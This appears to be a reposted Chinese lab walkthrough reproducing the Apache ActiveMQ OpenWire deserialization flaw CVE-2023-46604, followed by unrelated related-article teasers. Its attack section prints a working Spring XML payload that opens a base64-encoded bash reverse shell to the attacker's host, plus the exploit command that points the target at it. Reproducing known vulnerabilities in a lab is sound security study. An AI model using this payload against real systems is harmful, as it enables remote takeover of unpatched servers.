ActiveMQ-CVE-2023-46604

ActiveMQ-CVE-2023-46604

news2024/11/23 15:48:20

Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞

OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActvieMQ5.18.2版本以及以前，OpenWire协议通信过程中存在一处反序列化漏洞，该漏洞可以允许具有网络访问权限的远程攻击者通过操作OpenWire协议中的序列化类型，导致代理的类路径上任何类实例化，从而执行任意命令。

143为VPS

131为靶机

复现

先将poc移动到VPS /var/www/html目录下

开启http服务

攻击机执行命令

成功

利用反弹shell

将xml改成反弹shell

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xsi:schemaLocation="http://www.springframework.org/schema/beans

http://www.springframework.org/schema/beans/spring-beans.xsd">

<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

<constructor-arg>

<list>

<value>bash</value>

<value>-c</value>

<value>{echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE0My8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}</value>

</list>

</constructor-arg>

</bean>

</beans>

nc和http同时开启

攻击机执行命令

python exploit.py -i 192.168.62.131 -u http://192.168.62.143:8000/poc.xml

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1929175.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

相关文章

网页数据抓取：融合BeautifulSoup和Scrapy的高级爬虫技术

网页数据抓取：融合BeautifulSoup和Scrapy的高级爬虫技术

网页数据抓取：融合BeautifulSoup和Scrapy的高级爬虫技术在当今的大数据时代，网络爬虫技术已经成为获取信息的重要手段之一。Python凭借其强大的库支持，成为了进行网页数据抓取的首选语言。在众多的爬虫库中，BeautifulSoup和Scrap…

阅读更多...

1140 分珠

1140 分珠

这是一个图的划分问题，可以使用深度优先搜索（DFS）或广度优先搜索（BFS）来解决。我们需要找到一种划分方式，使得划分后的两部分总重的差值的绝对值最小。以下是对应的C代码： #include <iost…

阅读更多...

房地产市场2024年展望——深度解读行业趋势

房地产市场2024年展望——深度解读行业趋势

作为一名有十多年经验的地产营销人，对于2024年房地产行业的发展趋势，我认为可以从以下几个方面来探讨，如果觉得对你有帮助，请不吝一个三连（赞同喜欢收藏） 一、市场调整与分化加剧在经历了较长时间的市场…

阅读更多...

用chatgpt写了个二级导航，我全程一个代码没写，都是复制粘贴

用chatgpt写了个二级导航，我全程一个代码没写，都是复制粘贴

今天心血来潮，让chatgpt给我写个移动端的二级导航菜单，效果如下： 1、两级导航，竖向排列，一级导航默认显示，二级隐藏 2、抽屉伸缩效果，点击一级导航，展开二级导航，再次点…

阅读更多...

同步IO、异步IO以及五种网络IO模式

目录一、同步IO和异步IO 二、五种网络IO模式 1、阻塞IO 2、非阻塞IO 3、IO多路复用 3.1、SELECT 3.2、POLL 3.3、EPOLL 一、同步IO和异步IO 场景1： 小明去打开水，而开水塔此时没有水，小明在现场一直等待开水到来，或者不断…

阅读更多...

老牌数据库HRS，三分之二二区以上！| CHARLS等七大老年公共数据库周报（7.10）...

老牌数据库HRS，三分之二二区以上！| CHARLS等七大老年公共数据库周报（7.10）...

七大老年公共数据库七大老年公共数据库共涵盖33个国家的数据，包括：美国健康与退休研究 (Health and Retirement Study, HRS)；英国老龄化纵向研究 （English Longitudinal Study of Ageing, ELSA）；欧洲健康、…

阅读更多...

图片转文字的软件，分享3种不同的类型的软件！

图片转文字的软件，分享3种不同的类型的软件！

在信息爆炸的时代，图片作为一种直观、生动的信息载体，已经成为我们日常生活中不可或缺的一部分。然而，有时候我们可能需要将图片中的文字提取出来，以便于编辑、整理或进一步使用。那么，有哪些实用的图片转文字软件可以…

阅读更多...

基于粒子滤波和帧差法的目标跟踪matlab仿真

基于粒子滤波和帧差法的目标跟踪matlab仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 4.1 帧差法 4.2 粒子滤波 4.3 粒子滤波与帧差法的结合 5.算法完整程序工程 1.算法运行效果图预览 (完整程序运行后无水印) 原重采样方法： 改进重采样方法： 2.算法…

阅读更多...

OpenSceneGraph学习笔记

OpenSceneGraph学习笔记

目录引言第一章：OSG概述一、前言（1）为什么要学习OSG?（2）OSG的组成（3）OSG的智能指针（4）OSG的安装编译二、第一个OSG程序（1）Hello OSG程序&#…

阅读更多...

关于升级WIN11后，点击功能面板空白的解决方法

关于升级WIN11后，点击功能面板空白的解决方法

方法一：先试试按下WinX,选择Windows powershell(管理员)，输入sfc /scannow等待系统自动扫描完成后重启系统看看是否修复。方法二：打开微软Windows11镜像下载官网：Download Windows 11，下载对应版本和语言的ISO系统镜…

阅读更多...

人工智能与伦理挑战：多维度应对策略

人工智能与伦理挑战：多维度应对策略

人工智能技术近年来取得了迅猛发展，广泛应用于医疗诊断、金融分析、教育辅助、自动驾驶等各个领域，极大地提升了生产效率和服务质量，推动了科技进步和商业创新。然而，伴随其普及和应用的泛滥，AI也带来了数据隐私侵犯、…

阅读更多...

【银河麒麟操作系统】虚机重启lvs丢失现象分析及处理建议

【银河麒麟操作系统】虚机重启lvs丢失现象分析及处理建议

了解银河麒麟操作系统更多全新产品，请点击访问麒麟软件产品专区：https://product.kylinos.cn 环境及现象描述 40台虚机强制重启后，其中8台虚机找不到逻辑卷导致启动异常，后续通过pvcreate 修复重建pv，激活vg和lv并修复…

阅读更多...

基于python的图像去水印

基于python的图像去水印

1 代码 import cv2 import numpy as npdef remove_watermark(image_path, output_path):# 读取图片image cv2.imread(image_path)# 转换为灰度图gray cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)# 使用中值滤波去除噪声median_filtered cv2.medianBlur(gray, 5)# 计算图像的梯…

阅读更多...

Spring MVC 中的拦截器的使用“拦截器基本配置” 和 “拦截器高级配置”

Spring MVC 中的拦截器的使用“拦截器基本配置” 和 “拦截器高级配置”

1. Spring MVC 中的拦截器的使用“拦截器基本配置” 和 “拦截器高级配置” 文章目录 1. Spring MVC 中的拦截器的使用“拦截器基本配置” 和 “拦截器高级配置”2. 拦截器3. Spring MVC 中的拦截器的创建和基本配置3.1 定义拦截3.2 拦截器基本配置3.3 拦截器的高级配置 4. Spr…

阅读更多...

初识C++|类和对象（中）——类的默认成员函数

初识C++|类和对象（中）——类的默认成员函数

🍬 mooridy-CSDN博客 🧁C专栏（更新中！） 🍹初始C|类与对象（上）-CSDN博客 4. 类的默认成员函数默认成员函数就是⽤⼾没有显式实现，编译器会⾃动⽣成的成员函数称为默认成…

阅读更多...

数字孪生技术栈：简单选three.js，复杂选unity3D，基本不会错。

数字孪生技术栈：简单选three.js，复杂选unity3D，基本不会错。

数字孪生项目中涉及到3D模型交互的部分，选择什么技术栈呢，一般来说遵循这个原则：简单的应用可以选择Three.js，而复杂的应用则更适合选择Unity3D。 Three.js是一个基于WebGL的开源JavaScript库，用于在Web浏览器中创建和…

阅读更多...

IP地址定位与GPS定位：技术解析与应用比较

IP地址定位与GPS定位：技术解析与应用比较

IP地址定位和GPS定位是比较常见的定位技术。本文将与大家探讨这两种技术的工作原理、优缺点及其在实际应用中的比较和融合。 IP地址定位 IP地址定位的工作原理 IP地址（InternetProtocolAddress）是分配给联网设备的唯一标识符。IP地址定位通过分析设备…

阅读更多...

基于springboot3实现单点登录(一): 单点登录及其相关概念介绍

基于springboot3实现单点登录(一): 单点登录及其相关概念介绍

引言应网友要求，从本文开始我们将实现一套基于springboot3springsecurity的单点登录认证系统。单点登录的实现方式有多种，接下来我们会以oauth2为例来介绍和实现。单点登录介绍单点登录（Single Sign-On，简称SSO&#xff0…

阅读更多...

LeetCode-环形链表、环形链表 II

LeetCode-环形链表、环形链表 II

一、环形链表 . - 力扣（LeetCode） 判断是否有环，使用快慢指针，开始时都指向头节点，快指针每次走两部，慢指针每次走一步，如果在走的过程中，慢指针和快指针相同（也就是快指…

阅读更多...

STM32第九课：STM32-基于标准库的42步进电机的简单I/O控制（附电机教程，看到即赚到）

STM32第九课：STM32-基于标准库的42步进电机的简单I/O控制（附电机教程，看到即赚到）

一：步进电机简介步进电机又称为脉冲电机，简而言之，就是一步一步前进的电机。基于最基本的电磁铁原理,它是一种可以自由回转的电磁铁,其动作原理是依靠气隙磁导的变化来产生电磁转矩，步进电机的角位移量与输入的脉冲个数严格成正比…

阅读更多...

推荐文章

最新文章